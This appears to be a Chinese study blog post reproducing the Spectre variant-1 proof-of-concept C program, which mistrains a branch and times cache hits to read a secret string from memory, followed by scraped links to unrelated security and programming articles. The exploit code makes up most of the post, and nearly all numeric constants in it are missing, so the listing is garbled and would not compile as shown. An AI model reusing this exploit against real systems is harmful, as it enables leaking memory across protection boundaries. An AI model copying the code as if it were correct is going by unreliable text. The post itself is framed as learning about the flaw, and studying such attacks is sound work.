这几天报道了Intel的漏洞,这里学习一下并做个记录。

报告:https://spectreattack.com/spectre.pdf

 #include <stdio.h>

 #include <stdlib.h>

 #include <stdint.h>

 #include <string.h>

 #ifdef _MSC_VER        //编译器根据版本自动调用lib库

 #include <intrin.h>        //用于内核编程

 #pragma optimize("gt", on)    //允许全局优化和指定更短的机器代码序列,on是打开功能

 #else

 #include <x86intrin.h>

 #endif

 unsigned int array1_size = ;

 uint8_t unused1[];

 uint8_t array1[] = {,,,,,,,,,,,,,,,};

 uint8_t unused2[];

 uint8_t array2[ * ];

 char * secret = "The Magic Words are QKSword";        //插入内核的字符串

 uint8_t temp = ; /* Used so compiler won’t optimize out victim_function() */

 void victim_function(size_t x)

 {

     if (x < array1_size)

     {

         temp &= array2[array1[x] * ];

     }

 }

 /********************************************************************

 Analysis code

 ********************************************************************/

 #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

                                /* Report best guess in value[0] and runner-up in value[1] */

 void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])

 {

     static int results[];

     int tries, i, j, k, mix_i;

     unsigned int junk = ;

     size_t training_x, x;

     register uint64_t time1, time2;

     volatile uint8_t * addr;

     for (i = ; i < ; i++)

         results[i] = ;

     for (tries = ; tries > ; tries--)

     {

         /* Flush array2[256*(0..255)] from cache */

         for (i = ; i < ; i++)

             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */

                                             /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */

         training_x = tries % array1_size;

         for (j = ; j >= ; j--) {

             _mm_clflush(&array1_size);

             for (volatile int z = ; z < ; z++) {} /* Delay (can also mfence) */

                                                         /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */

                                                         /* Avoid jumps in case those tip off the branch predictor */

             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

             x = (x | (x >> )); /* Set x=-1 if j&6=0, else x=0 */

             x = training_x ^ (x & (malicious_x ^ training_x));

             /* Call the victim! */

             victim_function(x);

         }

         /* Time reads. Order is lightly mixed up to prevent stride prediction */

         for (i = ; i < ; i++)

         {

             mix_i = ((i * ) + ) & ;

             addr = &array2[mix_i * ];

             time1 = __rdtscp(&junk); /* READ TIMER */

             junk = *addr; /* MEMORY ACCESS TO TIME */

             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                 results[mix_i]++; /* cache hit - add +1 to score for this value */

         }

         /* Locate highest & second-highest results results tallies in j/k */

         j = k = -;

         for (i = ; i < ; i++)

         {

             if (j <  || results[i] >= results[j])

             {

                 k = j;

                 j = i;

             }

             else if (k <  || results[i] >= results[k])

             {

                 k = i;

             }

         }

         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

     }

     results[] ^= junk; /* use junk so code above won’t get optimized out*/

     value[] = (uint8_t)j;

     score[] = results[j];

     value[] = (uint8_t)k;

     score[] = results[k];

 }

 int main(int argc, const char * * argv)

 {

     printf("Putting '%s' in memory\n", secret);

     size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */

     int i, score[], len = strlen(secret);

     uint8_t value[];

     for (i = ; i < sizeof(array2); i++)

         array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */

     if (argc == )

     {

         sscanf_s(argv[], "%p", (void * *)(&malicious_x));

         malicious_x -= (size_t)array1; /* Convert input value into a pointer */

         sscanf_s(argv[], "%d", &len);

     }

     printf("Reading %d bytes:\n", len);

     while (--len >= )

     {

         printf("Reading at malicious_x = %p... ", (void *)malicious_x);

         readMemoryByte(malicious_x++, value, score);        //读取写入的字符串

         printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));

         printf("0x%02X=’%c’ score=%d ", value[],

             (value[] >  && value[] <  ? value[] : '?'), score[]);

         if (score[] > )

             printf("(second best: 0x%02X score=%d)", value[], score[]);

         printf("\n");

     }

     system("pause");

     return ();

 }

这个程序的主要功能就是把一段字符串写入内核中,然后通过漏洞读取出来,用来检测电脑是否存在漏洞。

代码还没全部注释完,这里先放一下,以免忘记

关于Intel漏洞的学习的更多相关文章

  1. [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇

    目录 [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇 格式化输出函数 printf函数族功能介绍 printf参数 type(类型) flags(标志) number(宽度) precisi ...

  2. [Web安全] XXE漏洞攻防学习(中)

    0x00.XXE漏洞攻击实例 攻击思路: 1. 引用外部实体远程文件读取 2. Blind XXE 3. Dos 0x01.外部实体引用,有回显 实验操作平台:bWAPP平台上的XXE题目 题目: 进 ...

  3. Linux kernel pwn notes(内核漏洞利用学习)

    前言 对这段时间学习的 linux 内核中的一些简单的利用技术做一个记录,如有差错,请见谅. 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了 ...

  4. CVE-2018-2628 weblogic WLS反序列化漏洞--RCE学习笔记

    weblogic WLS 反序列化漏洞学习 鸣谢 感谢POC和分析文档的作者-绿盟大佬=>liaoxinxi:感谢群内各位大佬及时传播了分析文档,我才有幸能看到. 漏洞简介 漏洞威胁:RCE-- ...

  5. 微软 IIS HTTP.sys漏洞原理学习以及POC

    零.MS15-034POC核心部分(参考巡风): socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket. ...

  6. dedecms_v5.7的apache文件名解析漏洞的学习

    0x00 Apache文件名解析漏洞 Apache是一个Web服务器,可以提供web服务.配合java中间件.PHP实现动态页面访问. Apache和PHP通过接口接入后,Apache接受用户的请求, ...

  7. Intel汇编语言程序设计学习-第一章 基本概念

    第一章基本概念 1.1  简单介绍 本书着重讲述MS-Windows平台上IA-32(Intel Architecture 32bit,英特尔32位体系架构)兼容微处理器的汇编语言程序设计,可以使用I ...

  8. Intel汇编语言程序设计学习笔记1

    第一章 汇编器链接器:汇编器将汇编语言翻译成机器语言,链接器将单个文件合并为可执行文件 intel 80X86系列处理器的汇编语言与VAX或者motorala 68x00等系统的汇编是否相同?不相同, ...

  9. xxe漏洞的学习与利用总结

    前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识. xml基础知识 要了解xxe漏洞,那么一定得先 ...

随机推荐

  1. JAVA:测试java虚拟机支持的最大内存 Xmx 值?Tomcat 内存溢出?(转)

    如下命令,即可测试:不断调整n的值,windows上32位的1.6x为: 1610m java -Xmx1610M -versionjava -Xmx1610m -version 网摘的tomcat内 ...

  2. 元数据管理器中存在错误。 实例化来自文件“\\?\C:\Program Files\Microsoft SQL Server\MSAS11.MSSQLSERVER\OLAP\Data\Tfs_Analysis.0.db\vDimTestCaseOverlay.874.dim.xml”的元数据对象时出错。

    一.发现问题 启动SQLSERVER的数据分析服务失败 查看系统日志错误如下: 双击错误后显示详细错误: 元数据管理器中存在错误. 实例化来自文件“\\?\C:\Program Files\Micro ...

  3. JS实现网站内容的禁止复制和粘贴、另存为

    1.使右键和复制失效方法1:在网页中加入以下代码: <script language="Javascript"> document.oncontextmenu=new  ...

  4. hive使用python脚本导致java.io.IOException: Broken pipe异常退出

    反垃圾rd那边有一个hql,在执行过程中出现错误退出,报java.io.IOException: Broken pipe异常,hql中使用到了python脚本,hql和python脚本最近没有人改过, ...

  5. go微服务框架go-micro深度学习(一) 整体架构介绍

    产品嘴里的一个小项目,从立项到开发上线,随着时间和需求的不断激增,会越来越复杂,变成一个大项目,如果前期项目架构没设计的不好,代码会越来越臃肿,难以维护,后期的每次产品迭代上线都会牵一发而动全身.项目 ...

  6. 说说Python编码规范

    前言 已有近两个月没有发表过文章了,前段时间外甥和女儿过来这边渡暑假,平常晚上和周末时间都陪着她们了,趁这个周末有空,再抽空再把这块拾起来.         这么久没写了,再次拿起键盘,想想,发表些什 ...

  7. [转]你可能不知道的五个强大HTML5 API

    一.全屏 // 找到适合浏览器的全屏方法 function launchFullScreen(element) { if(element.requestFullScreen) { element.re ...

  8. RabbitMQ五种消息队列学习(三)–Work模式

    由于在实际应用中,简单队列模型无法解决很多实际问题,而且生产者和消费者是一对一的关系.模型较为单一.故引入Work模式. 结构图 一个生产者.多个消费者. 一个消息只能被一个消费者获取. 测试实现:  ...

  9. 18.翻译系列:EF 6 Code-First 中的Seed Data(种子数据或原始测试数据)【EF 6 Code-First系列】

    原文链接:https://www.entityframeworktutorial.net/code-first/seed-database-in-code-first.aspx EF 6 Code-F ...

  10. Linux使用curl 方式安装docker-compose 后执行docker-compose version 检查安装是否成功时出错的解决办法

    0x0.缘起: 今天在一台新的Fedora 25上按照官方文档,使用curl方式安装 docker-compose后,验证是否安装成功时出错: 安装时使用的命令为; curl -L https://g ...